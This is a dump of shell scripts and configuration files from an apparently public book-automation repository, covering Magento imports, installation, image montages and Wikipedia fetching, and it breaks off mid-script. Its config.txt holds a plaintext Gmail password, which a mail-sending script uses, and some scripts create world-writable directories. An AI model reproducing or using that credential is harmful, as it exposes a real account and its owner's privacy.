structure\nmediatargetpath=$SFB_MAGENTO_HOME\"media/import/\"\nmediaarchivetxt=$SFB_MAGENTO_HOME\"media/archive/txt/\"\nscriptpath=$SFB_HOME\"scripts/\" # all PK programs run from $scriptpath unless special circumstances require\nconfdir=$SFB_HOME\"conf/\"\ntextpath=$SFB_HOME\"txt/\"\nconfpath=$SFB_HOME\"conf/\" # need to dedup\nlogdir=$LOCAL_DATA\"logs/uuid/\"\nimagedir=\"images/\" # change occurrences elsewhere for consistency with treatment of logdir\nsfb_log=$logdir\"sfb_log.txt\"\nxformlog=$logdir$uuid\"/xformlog.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\nsfb_log_archive=$LOCAL_DATA\"logs/sfb_log_archive.log\"\nebooksdelivery=$SFB_MAGENTO_HOME\"media/ebooks/\"\nlogdir=$LOCAL_DATA\"logs/uuids/\"\nsfb_log=$logdir\"sfb_log.txt\"\nxformlog=$logdir$uuid\"/xformlog.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\nsfb_log_archive=$LOCAL_DATA\"archives/sfb_log_archive.txt\"\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.7743242979049683, "alphanum_fraction": 0.7743242979049683, "avg_line_length": 21.272727966308594, "blob_id": "7af682f009c0cb98a3e991e369bc19c0f8c42263", "content_id": "49a5ae6e8c066487c236b3bba7f41b3bb2851f8d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 740, "license_type": "permissive", "max_line_length": 108, "num_lines": 33, "path": "/scripts/build_bookshelf.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n#!bin/bash\n\n# script that manages category imports into Magento\n\n# get configuration variables\n\n. ../conf/config.txt\n\necho \"got config file from \"$MACHINE_NAME\n\necho \"config file imported\"\n\nwhile read bookshelf\ndo\n\n\techo \"building bookshelf\" $bookshelf\"onto the receiving dock\"\n\n\techo \"metadatarget path is\" $metadatatargetpath\n\tcp $metadatatargetpath$bookshelf/import_bulk_categories.csv $metadatatargetpath\"import_bulk_categories.csv\"\n\n\techo \"adding customer bookshelves to the category tree\"\n\n\tcd $SFB_MAGENTO_HOME ; $SFB_PHP_BIN $scriptpath\"bin/import_cat.php\"\n\n\tcd $scriptpath\n\ndone<$scriptpath\"import_status/category_manifest.csv\"\n\nrm $scriptpath\"import_status/category_manifest.csv\"\n\necho \"done with that set of shelves\" \n\nexit\n\n\n\n\n" }, { "alpha_fraction": 0.7246376872062683, "alphanum_fraction": 0.7246376872062683, "avg_line_length": 12.800000190734863, "blob_id": "c4780262cd3a42e819ede2fa905c4e77351f9fbc", "content_id": "dd1bd125144da112e09a7ba4b6f7300b8bb6561b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 69, "license_type": "permissive", "max_line_length": 30, "num_lines": 5, "path": "/scripts/txtdir2wordcloud.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nfor file in *.txt\ndo\n\tbin/wordcloudwrapper.sh $file\ndone\n" }, { "alpha_fraction": 0.5284060835838318, "alphanum_fraction": 0.5831141471862793, "avg_line_length": 35.89320373535156, "blob_id": "d4a443a3a770083e286ad443fc29aa636cc1bb84", "content_id": "e213685fe82ea07cec667bad493a333b4040337c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3802, "license_type": "permissive", "max_line_length": 76, "num_lines": 103, "path": "/scripts/montage_all_named_colors.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#\n# hsl_named_colors [output_image]\n#\n# Convert all named colors known by IM into three HSL colorwheels\n# Off-Whites, Mid-Tones, and Dark Colors.\n#\n\n(\n # Draw a gradient line for the HSL axis. (offset by color spot center)\n convert -size 1x251 -page +116+3 gradient:black-white miff:-\n\n # Draw the color axis for main disk\n convert -size 221x121 -page +6+68 xc:none \\\n -draw 'fill Red line 110,60 220,60' \\\n -draw 'fill Cyan line 110,60 0,60' \\\n -draw 'fill Blue line 110,60 33,0' \\\n -draw 'fill Lime line 110,60 33,120' \\\n -draw 'fill Magenta line 110,60 187,0' \\\n -draw 'fill Yellow line 110,60 187,120' \\\n miff:-\n\n # Read known named colors, with only numbered greys.\n convert -list color |\n sed '/^\\(Path\\|Name\\|----\\)/d;\n /[a-z] [a-z]/d; # color with space in name! - Yuck\n s/ .*//; /^$/d' |\n\n # don't output colors containing numbers\n #s/ .*//; /^$/d; /[0-9]/d' |\n\n # output 10% gray color scale too.\n #s/ .*//; /^$/d; /^gray[0-9]*0$/p; /[0-9]/d' |\n\n # reverse order so most common is given last\n tac |\n\n # convert named color into a positions spot of color\n while read color\n do\n # Ignore some specific colors (remove black spot in dark colors)\n case $color in\n transparent|none) continue ;; # transparent colors\n matte|opaque|fractal) continue ;; # opaque colors\n grey*) continue ;; # percentage greys\n esac\n\n # Now convert the named color to HSL color space color\n hsl=`convert xc:$color -colorspace HSL -depth 16 txt: |\n sed '1d; s/^.*: (//; s/).*//; s/,/ /g;' `\n\n # Luminance or how bright the color is...\n # Separate colors into three groups Off White, Dark, Midtone\n # Make the saturation radius of dark and light colors smaller.\n lum=`echo $hsl | awk '{print int($3/65536*100)}'` # percentage\n if [ $lum -lt 40 ]; then lum=40 radius=50 # dark colorwheel\n elif [ $lum -gt 80 ]; then lum=210 radius=50 # off-white colorwheel\n else lum=125 radius=100 # midtone colorwheel\n fi\n\n # Saturation determines the radius.\n # Spread out midtones to cover more of the color wheel\n sat=`echo $hsl | awk '{print $2/65536*'$radius'}'`\n\n # Greyscale colors leave luminance as is, so as to for a (HSL Axis)\n case $color in\n #grey*|\n white|black)\n lum=`echo $hsl | awk '{print int($3/65536*250)}'` ;;\n esac\n\n # Hue in degrees\n hue=`echo $hsl | awk '{print $1/65536*360}'`\n\n # determine X,Y coordinates of this color in chart\n x=`identify -format \"%[fx:int( $sat*cos($hue*pi/180) + 110 )]\" xc:`\n y=`identify -format \"%[fx:int( $sat*sin($hue*pi/180)/2.2 +$lum )]\" xc:`\n\n # For Debugging\n # output the color and final position\n #awk >&2 'BEGIN{printf(\"%-20s %6.2f,%4.1f,%2s %3s,%s\\n\",\n # '\"\\\"$color\\\", $hue,$sat,$lum, $x,$y) }\"\n\n # Now generate a color spot in three color wheels using these values.\n convert -size 13x7 -page \"+$x+$y\" xc:none \\\n -draw \"fill $color arc 0,0 12,6 0,360\" miff:-\n\n done\n\n # Redraw parts of axis that is in foreground (over color spots)\n convert -size 1x251 -page +116+3 gradient:black-white \\\n \\( xc:none -draw 'line 0,40 0,70' \\\n -draw 'line 0,125 0,180' \\\n -draw 'line 0,210 0,240' \\\n \\) -alpha set -compose DstIn -composite miff:-\n\n) |\n# Just a montage of all color in alphabetical order\nmontage MIFF:- +repage -background none -geometry +2+2 montage.png \n\n# read positioned color spots, and merge together\nconvert -background Gray45 MIFF:- -layers merge +repage \\\n -bordercolor Gray45 -border 10 -flip \"${1:-\"show:\"}\"\n\n\n" }, { "alpha_fraction": 0.7479935884475708, "alphanum_fraction": 0.7724719047546387, "avg_line_length": 23.673267364501953, "blob_id": "1169a7336bbf04d039f277faff8dbf856ae628c8", "content_id": "38201b6f72f7433dcbb47cba685b4f6c396ecc81", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2492, "license_type": "permissive", "max_line_length": 109, "num_lines": 101, "path": "/debian-simple.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n# This is the simple version of the install script for PageKicker.\n#\n# get master repository via git clone\n\n#cd ~\n#git clone https://github.com/fredzannarbor/pagekicker-community.git\n\n# cd into the repo and run this script\n# cd pagekicker-community\n# ./simple-install.sh\n# it will do the following\n\n# create outside repo directory structure\n\nmkdir -m 755 ~/.pagekicker\nmkdir -m 777 -p /tmp/pagekicker\nmkdir -m 755 ~/magento # stub directory for optional import/export to catalog\n\n# put default configuration file in place\n# inspect it to make sure paths are correct\n\n\ncp ~/pagekicker-community/conf/config_defaults.txt \"$HOME\"/.pagekicker/config.txt\n\n# installs debian dependencies\n# takes 20-30 min on 12 MB download\n\nsudo apt-get install -y \\\napache2 \\\nbuild-essential \\\ncalibre \\\ndefault-jre \\\nfdupes \\\ngit \\\nimagemagick \\\nmysql-client \\\npandoc \\\npdfgrep \\\npdftk \\\nperl \\\nphp5-cli \\\npoppler-utils \\\npython2.7 \\\npython3-dev \\\npython-pip \\\npython3-pip \\\nsendemail \\\ntexlive-xetex \\\nttf-dejavu \\\nxmlstarlet\n\n\n# install python dependencies\n\ncd ~/pagekicker-community\nsudo pip install -r requirements.txt\n\n# failing for Mac:\nsudo pip3 install -r requirements.txt\n\n# create local-data hierarchy\n\nmkdir -p local-data/bibliography local-data/bibliography/imprints local-data/bibliography/imprints/pagekicker\nmkdir -p local-data/bibliography/robots local-data/bibliography/robots/default\nmkdir -p local-data/bibliography/yaml\nmkdir -p local-data/jobprofile_builds/default\nmkdir -p local-data/logs/uuids\nmkdir -p local-data/seeds/history\nmkdir -p local-data/seeds/SKUs\necho \"1000001\" > local-data/SKUs/sku_list\ntouch local-data/bibliography/robots/default/default_titles.txt\n\n# fetches & deploys third party apps stored in PageKicker scripts/lib\n\ncd ~/pagekicker-community/scripts/lib\ngit clone https://github.com/jarun/googler.git\nmkdir KindleGen\ncd KindleGen\nwget http://kindlegen.s3.amazonaws.com/kindlegen_linux_2.6_i386_v2_9.tar.gz\ntar -xvf kindlegen_linux_2.6_i386_v2_9.tar.gz\ncd ..\nwget https://nlp.stanford.edu/software/stanford-ner-2018-02-27.zip\nunzip https://nlp.stanford.edu/software/stanford-ner-2018-02-27.zip\n\n# fix hard-coded IBMcloud configuration file\n\ncd ~/pagekicker-community/scripts/lib/IBMcloud/examples\nsed -i \"s/fred/\"$USER\"/\" configuration.txt\n\n# set up imagemagick configuration\n\nmkdir ~/.magick\ncd ~/pagekicker-community\ncp conf/colors.xml ~/.magick/colors.xml\nconf/imagemagick-fonts.pl > ~/.magick/fonts.xml\n\nsleep 2\n\necho \"install script finished running\"\n" }, { "alpha_fraction": 0.7126760482788086, "alphanum_fraction": 0.7154929637908936, "avg_line_length": 40.70588302612305, "blob_id": "f003061488d126f78c800f5817bef9bba0d7bc53", "content_id": "ead60723cf6c343f101a9b65293a14be579720b0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 710, "license_type": "permissive", "max_line_length": 118, "num_lines": 17, "path": "/scripts/cloudprep.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# creates summaries and NER reports for all txt files in a directory in preparation for building a big wordcloud\n\n. includes/set-variables.sh\nfor file in *.txt*\ndo\n\toutfile=`basename $file`\n \"$PYTHON_BIN\" $scriptpath/bin/PKsum.py $file --output $file.sum\n \"$PYTHON_BIN\" $scriptpath/bin/nerv3.py $file $file.ner $file'.'\n\t /opt/bitnami/apache2/htdocs/pk-new/development/scripts/bin/wordcloudwrapper.sh --txtinfile $file --outfile $outfile \n echo \"did \" $file \ndone\necho \"done with directory\"\ncat *.ner > all.ner\ncat *.sum > all.sum\ncat all.ner all.sum > all.all\necho \"concatenated results into files containing all NER results, all summary results, and the union of both\"\n\n" }, { "alpha_fraction": 0.778064489364624, "alphanum_fraction": 0.778064489364624, "avg_line_length": 58.61538314819336, "blob_id": "7df209adac0427631e57782e552c9dc875f9212c", "content_id": "f2212909e0ac95cd07b8c12d4dd0c90995d2d7b9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 775, "license_type": "permissive", "max_line_length": 134, "num_lines": 13, "path": "/CONTRIBUTING.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# Contributing Guidelines\n\nPlease submit pull requests!\n\n - Pull request titles and commit messages should have the form `FIELD: FULL NAME`, e.g., `mathematics: Tim Gowers`\n - Each expert should come paired with a single blog post representative of the field they represent and the quality of their writing.\n - Experts may be repeated in mutliple fields if they represent multiple fields. Submit a separate link for each subfield.\n - Good writers are preferred.\n - Detailed writers are preferred.\n - Writers who make effort to spread knowledge are preferred.\n - Active writers are preferred (inactive writers may be included, but will be placed in a separate archival location)\n\nI get the final say in what is included. If you don't like my guidelines, you're welcome to fork :)\n" }, { "alpha_fraction": 0.7795275449752808, "alphanum_fraction": 0.7952755689620972, "avg_line_length": 62.5, "blob_id": "95adc842bf6b9f29a4f0f83070861afb74d6690d", "content_id": "98f11855bac79ad250d729a33e4cfa6daaf40b50", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 127, "license_type": "permissive", "max_line_length": 114, "num_lines": 2, "path": "/test/prsoop3.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh /opt/bitnami/apache2/htdocs/git-pk-production/pagekicker-community/test/prsoop.csv 3\n" }, { "alpha_fraction": 0.7531741857528687, "alphanum_fraction": 0.7663788795471191, "avg_line_length": 42.75555419921875, "blob_id": "41339c7be9886958e2964b2dae880361392dc7e8", "content_id": "c6d573af4e3920502b27e6fe07b767e3b2dc8104", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1969, "license_type": "permissive", "max_line_length": 131, "num_lines": 45, "path": "/conf/config.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# configuration file\n# all these values in this block must be customized\nMACHINE_NAME=\"Fred's Personal PageKicker Box\"\nTMPDIR=\"/tmp/pagekicker/\"\nSFB_HOME=\"/home/fred/pagekicker-community/\"\nLOCAL_DATA=\"$SFB_HOME\"local-data/\nSFB_MAGENTO_HOME=\"/home/fred/bin/magento-1.9.2.4-1/apps/magento/htdocs/\"\nSFB_PHP_BIN=\"/usr/bin/php\"\nJAVA_BIN=\"/usr/bin/java\"\nPYTHON_BIN=\"/usr/bin/python\"\nPANDOC_BIN=\"/usr/bin/pandoc\"\nSFB_VERSION=`git rev-parse HEAD` #replace with git command that produces unique identifier\nenvironment=\"git-fred-development\" # each environment is assumed to have a separate working tree\nCOMMUNITY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\nMY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\ngoogle_form=\"http://goo.gl/forms/ur1Otr1G2q\" #Google feedback form used in delivery email\nimport_available_on_machine=\"no\"\n\nUSER_HOME=\"/home/$USER/\"\nLOCAL_USER=\"fred\"\nWEB_HOST=\"http://127.0.0.1/\"\nWEB_ROOT=\"/home/fred/bin/magento-1.9.2.4-1/apache2/htdocs$\"\"pk-html/\" # place where html files generated by PK for users are stored\nWEB_SCRIPTPATH=\"scripts/\"\nAPACHE_ROOT=\"/home/fred/bin/magento-1.9.2.4-1/apache2/htdocs$\"\nLOCAL_MYSQL_PATH=\"/opt/bitnami/mysql/bin/mysql\"\nLOCAL_MYSQL_USER=\"root\"\nLOCAL_MYSQL_PASSWORD=\"$PASSWORD\"\nmetadatatargetpath=$SFB_MAGENTO_HOME\"var/import/\" # these all follow Magento file structure\nmediatargetpath=$SFB_MAGENTO_HOME\"media/import/\"\nmediaarchivetxt=$SFB_MAGENTO_HOME\"media/archive/txt/\"\nWEBFORMSXML_HOME=$SFB_MAGENTO_HOME\"media/webforms/xml/\"\nscriptpath=$SFB_HOME\"scripts/\" # all PK programs run from $scriptpath unless special circumstances require\nconfdir=$SFB_HOME\"conf/\"\ntextpath=$SFB_HOME\"txt/\"\nimagedir=\"images/\"\nlogdir=$LOCAL_DATA\"logs/uuids/\"\nconfdir=\"$SFB_HOME\"conf/\nsfb_log=$logdir\"sfb_log.txt\"\nxformlog=$logdir$uuid\"/xformlog.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\nsfb_log_archive=$LOCAL_DATA\"logs/sfb_log_archive.log\"\nGMAIL_ID=\"[email protected]\"\nGMAIL_PASSWORD=\"@Lm5kqxNEQy7\"\n" }, { "alpha_fraction": 0.6181046962738037, "alphanum_fraction": 0.6393210887908936, "avg_line_length": 18.108108520507812, "blob_id": "3bb3d48f98cd5776739bda6b0d6950e62fea3216", "content_id": "ec42b3dbad731aa414dd78e4e37e9902eeac99ec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 707, "license_type": "permissive", "max_line_length": 225, "num_lines": 37, "path": "/scripts/bin/pdf2x1a.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# converts pdf in command line to pdfx1a\n\nwhile :\ndo\n\tcase $1 in\n\t--help | -\\?)\n\t#\n\texit 0 # This is not an error, the user requested help, so do not exit status 1.\n\t;;\n\t--filepath)\n\tfilepath=$2\n\tshift 2\n\t;;\n\t--filepath=*)\n\tfilepath=${1#*=}\n\tshift\n\t;;\n--) # End of all options\n shift\n break\n ;;\n-*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n*) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\necho \"$filepath\"\n\n/home/fred/sfb/sfb-latest/trunk/scripts/lib/pstill_dist/pstill -M defaultall -m XimgAsCMYK -m Xspot -m Xoverprint -d 500 -m XPDFX=INTENTNAME -m XPDFXVERSION=1A -m XICCPROFILE=USWebCoatedSWOP.icc -o \"$filepath\".x1a \"$filepath\"\nexit 0\n" }, { "alpha_fraction": 0.676086962223053, "alphanum_fraction": 0.752173900604248, "avg_line_length": 29.600000381469727, "blob_id": "4cf3186ef64e5aeb9c562e259df2d18bf5765d91", "content_id": "11545aa91f46bb2055237d86ab9ed5aa4029e1f6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 460, "license_type": "permissive", "max_line_length": 90, "num_lines": 15, "path": "/scripts/bin/album_adder.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho $0 \"adds pics to fb album\"\n\nfilelist=$1\necho $filelist\nfilename=$(head -1 $filelist)\nalbumid=3383434980410523652\nbookcredit=\"image from THE SHIP KILLERS vol. 9 by the late Joe Hinds\"\nbookurl=\"http://www.amazon.com/Definitive-Illustrated-History-Torpedo-Boat/dp/193484067X/\"\nphotocaption=\"$bookcredit\"\" \"\"$bookurl\"\" filename is \"$filename\necho $photocaption\nfbcmd addpic \"$filename\" \"$albumid\" \"$photocaption\"\nsed -i '1,1d' $filelist \nexit 0\n\n" }, { "alpha_fraction": 0.6912878751754761, "alphanum_fraction": 0.7002840638160706, "avg_line_length": 34.74576187133789, "blob_id": "5280cfdc408d367ba82afbcbfd534cc9f81864b3", "content_id": "91eb18a2ba03a252d2603cbbaa04aa438576c240", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2112, "license_type": "permissive", "max_line_length": 649, "num_lines": 59, "path": "/scripts/bin/cat_adder.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# assumes one catid row per file\n\n# create $uuid\n\n\n\n# initialize variables\n\n. $HOME/.pagekicker/config.txt\n. includes/set-variables.sh\nrm /tmp/pagekicker/buildresult\n\n# adds books to specified categories with seed terms \n\n# uuid for csv file\n\nrow_no=1\n\nwhile read -r line ;\ndo\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\tmkdir -p -m 777 /tmp/pagekicker/$uuid\n\tmkdir -p -m 777 /tmp/pagekicker/$uuid/seeds\n\tmkdir -p -m 777 /tmp/pagekicker/$uuid/csv\n\tcurrent_row_location=\"/tmp/pagekicker/$uuid/csv/current_row\"\n\ttail -n$row_no \"$1\" | head -n1 > \"$current_row_location\"\n\n\t# echo \"$line\" > \"/tmp/pagekicker/$uuid/csv/row_no.\"$row_no\n\t\"$PYTHON_BIN\" $scriptpath\"bin/csv_to_ccc.py\" \"$current_row_location\" \"$uuid\"\n\t\n\techo \"running catalog entry creation command\"\n\tcatid=$(cat /tmp/pagekicker/$uuid/csv/row.catid)\n\tbooktitle=$(cat /tmp/pagekicker/$uuid/csv/row.booktitle)\n\techo catid is \"$catid\" and booktitle is\" $booktitle\"\n\tsed -e 's/\\^/\\n/g' /tmp/pagekicker/$uuid/csv/row.seeds > /tmp/pagekicker/$uuid/csv/seeds\n\n\tif [ \"$2\" = \"ccc_off\" ] ; then\n\t\techo \"not running ccc\"\n\telse\n\t\tbin/ccc.sh --format \"csv\" --passuuid \"$uuid\" --categories \"$catid\" --booktitle \"$booktitle\" --booktype \"Reader\" --covercolor \"Random\" --coverfont \"Minion\" --environment \"development\" --jobprofilename \"default\" --wikilang \"en\" --yourname \"DHS Social Monitoring\" --seedfile \"/tmp/pagekicker/$uuid/csv/seeds\" --builder \"no\" --book_description \"PageKicker robots will use the latest version of their software to search, analyze, and assemble real-time permissioned content relating to this topic when you download the book, so it is always improving and always current.\" --tldr \"This is one of the topics that DHS analysts monitor in social media.\"\n\tfi\n\techo \"exit value is $?\"\n\tif [ \"$?\" -eq 0 ] ; then \n\t\techo \"$line\" | tee --append /tmp/pagekicker/cat_adder_success\n\telse\n\t\techo \"$line\" | tee --append /tmp/pagekicker/cat_adder_failure\n\tfi\n\n\trow_no=$(( row_no + 1 ))\necho \"line is\" $line\ndone<$1\n\nrows_done=$(( $row_no - 1 ))\necho \"completed adding $rows_done new entries with categories assigned\"\n\n\nexit 0\n\n\n\n" }, { "alpha_fraction": 0.7374301552772522, "alphanum_fraction": 0.7374301552772522, "avg_line_length": 21.375, "blob_id": "ed7c7435bb6bc95188db2b6e43da311b1cfb748c", "content_id": "eb95d08875ba0629d511dd17ef16842d8cf0400a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 179, "license_type": "permissive", "max_line_length": 78, "num_lines": 8, "path": "/scripts/loop_over_category_ids.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# script loops over all exported category ids from PageKicker magento catalog \n\nwhile IFS=',' read -r catid description ; do\n\t#whatever\n\t\ndone <<category_id_file.csv\n" }, { "alpha_fraction": 0.6603466868400574, "alphanum_fraction": 0.6733477711677551, "avg_line_length": 23.613332748413086, "blob_id": "833ab214bec0bbf8436a44721ee715c47e1574cc", "content_id": "b8e052c8b456364f62b3cc38819921f3b4fdc3d6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1846, "license_type": "permissive", "max_line_length": 132, "num_lines": 75, "path": "/scripts/screen-naughty-seeds.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"*** HOLY CRAP! BEGINNING TO SCREEN OUT NAUGHTY SEEDS! *** \"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\n\n. includes/set-variables.sh\n\n# argparse\n# $1 is inbound seedphrases file\n# $2 is verbose\n\necho \"uuid received is $uuid\"\n\nmkdir -p -m 777 $TMPDIR\nmkdir -p -m 777 $TMPDIR$uuid\nmkdir -p -m 777 $TMPDIR$uuid/seeds\n\nwhile read -r line; do\n\nif grep -qw \"$line\" \"seeds/disallowed-seeds.txt\" ; then\n\n\techo \"the seed \"$line \"was disallowed\"\n\tdisallowed=\"$disallowed\"\"\\n \"\"$line\"\n\nelse\n\tif [ \"$2\" = \"v\" ] ; then\n\t\techo \"$line is not a naughty word -- your momma raised you right!\"\n\telse\n\t\ttrue\n\t\techo \"$line is not a naughty word -- your momma raised you right!\"\n\tfi\n\n\techo \"$line\" >> $TMPDIR$uuid/seeds/allowed_seeds.txt\nfi\n\n\ndone <$1\n\ncp $TMPDIR$uuid/seeds/allowed_seeds.txt $TMPDIR$uuid/seeds/seedphrases\n\nif [ -z ${disallowed+x} ] ; then\n\techo \"I checked your seeds to be sure there were no naughty words -- your momma raised you right!\" >> $TMPDIR$uuid/seeds/process.md\n\nelse\n\tsendemail -t \"$customer_email\" \\\n\t\t-m \"Disallowed words removed from $booktitle\\n: $disallowed\" \\\n\t\t-u \"Disallowed words removed from $booktitle.\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-o tls=yes\nfi\n\necho \" * * * DONE CHECKING NAUGHTY WORDS * * * \"\nexit 0\n" }, { "alpha_fraction": 0.6040342450141907, "alphanum_fraction": 0.6236529350280762, "avg_line_length": 35.918365478515625, "blob_id": "7bb7b5ae87b3c74a7613f49e5aef03c375027085", "content_id": "3317575c833e5fae1478a6eaaf808778db876d89", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3619, "license_type": "permissive", "max_line_length": 521, "num_lines": 98, "path": "/scripts/includes/fetch-linked-documents.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\t# fetch the documents for this seed\n\n\t# start with seed document \n\t\n\tcount=1\n\n\tseedfetchurlbase=\"http://\"$wikilocale\".wikipedia.org/w/index.php?action=render&title=\"\n\tseedfetchurl=$seedfetchurlbase$safeseed\n\n\tcurl --verbose --connect-timeout 60 --max-time 600 --max-redirs 1 --junk-session-cookies -o tmp/seed_document.html $seedfetchurl\n\nif [ $fetched_document_format= \"txt\" ] ; then\n\n\n\thtml2text -style pretty -nobs tmp/$uuid/seed_document.html > tmp/$uuid/seed_document.txt\n\nelse\n\n\techo \"no need to convert seed doc to txt\" | tee --append $sfb_log\n\nfi\n\n\techo 'processing fetch list' | tee --append $sfb_log\n\n\twhile IFS='\t' read title \n\t\tdo\t\n\t\t\t\n\t\techo \"title is \" $title\n\n\t\tsafetitle=$(echo $title | sed -e 's/%/%25/g' -e 's/ /%20/g' -e 's/!/%21/g' -e 's/\"/%22/g' -e 's/#/%23/g' -e 's/\\$/%24/g' -e 's/\\&/%26/g' -e 's/'\\''/%27/g' -e 's/(/%28/g' -e 's/)/%29/g' -e 's/\\*/%2a/g' -e 's/+/%2b/g' -e 's/,/%2c/g' -e 's/-/%2d/g' -e 's/\\./%2e/g' -e 's/\\//%2f/g' -e 's/:/%3a/g' -e 's/;/%3b/g' -e 's//%3e/g' -e 's/?/%3f/g' -e 's/@/%40/g' -e 's/\\[/%5b/g' -e 's/\\\\/%5c/g' -e 's/\\]/%5d/g' -e 's/\\^/%5e/g' -e 's/_/%5f/g' -e 's/`/%60/g' -e 's/{/%7b/g' -e 's/|/%7c/g' -e 's/}/%7d/g' -e 's/~/%7e/g' -e 's/;/_/g')\n\n\t\techo \"safetitle is \" $safetitle\n\n\n\t\tfetchurlbase=\"http://en.wikipedia.org/w/index.php?action=render&title=\"\n\t\techo \"fetchurlbase is\" $fetchurlbase | tee --append $sfb_log\n\t\tfetchurl=$fetchurlbase$safetitle\n\t\techo \"url to be fetched is\" $fetchurl | tee --append $sfb_log\n\n\t\t# shall we be polite?\n\n\t\t# sleep 1\n\n\t\t# implement curl persistent connection\n\t\t# implement curl connection tracking\n\n\t\tcurl --silent --compressed --retry 2 --retry-delay 5 --retry-max 15 --connect-timeout 30 --max-time 60 --max-redirs 2 --junk-session-cookies -o tmp/$uuid/$count.tmp $fetchurl\t\t\n\n\t\techo \"fetched document on \" $title \" and saved it to tmp/\"$uuid/$count\".tmp\" | tee --append $sfb_log\n\n\t\t# remove img links from count.tmp\n\n\n\n\t\tif [ $fetched_document_format= \"txt\" ] ; then\n\n\t\t\techo \"fetched document format is \" $fetched_document_format| tee --append $sfb_log\n\n\t\t mv tmp/$uuid/$count.tmp tmp/$uuid/$count.html\n\n\t\tsed -e \"s/<img[^>]*[^>]*>/images deleted/g\" -e \"s/'[edit]'//g\" | sed '/table id=\"toc\" class=\"toc\"/,/table>/d'\n\n\t\t\thtml2text -style pretty -nobs tmp/$uuid/$count\".html\" > tmp/$uuid/$count.txt\n\t\t\techo \"ran html2text on tmp/\" $uuid/$count\".html\" | tee --append $sfb_log\n\n\n\t\t\techo \"#\" \"Chapter \" $count\". \"$title >> tmp/tmp.cumulative.txt\n\t\t\techo \"#\" $h1 \"Chapter \" $count\". \"$title $h1end >> tmp/stored-toc-entries.html\n\t\t\tcat tmp/$uuid\"/\"$count\".txt\" >> tmp/$uuid/tmp.cumulative.txt\n\n\n\t\telse\n\t\t\n\t\t\techo \"fetched document format is \" $fetched_document_format | tee --append $sfb_log\n\n\t\t cat tmp/$uuid/$count.tmp | sed -e \"s/<img[^>]*[^>]*>/images deleted/g\" -e \"s/'[edit]'//g\" | sed '/table id=\"toc\" class=\"toc\"/,/table>/d' > 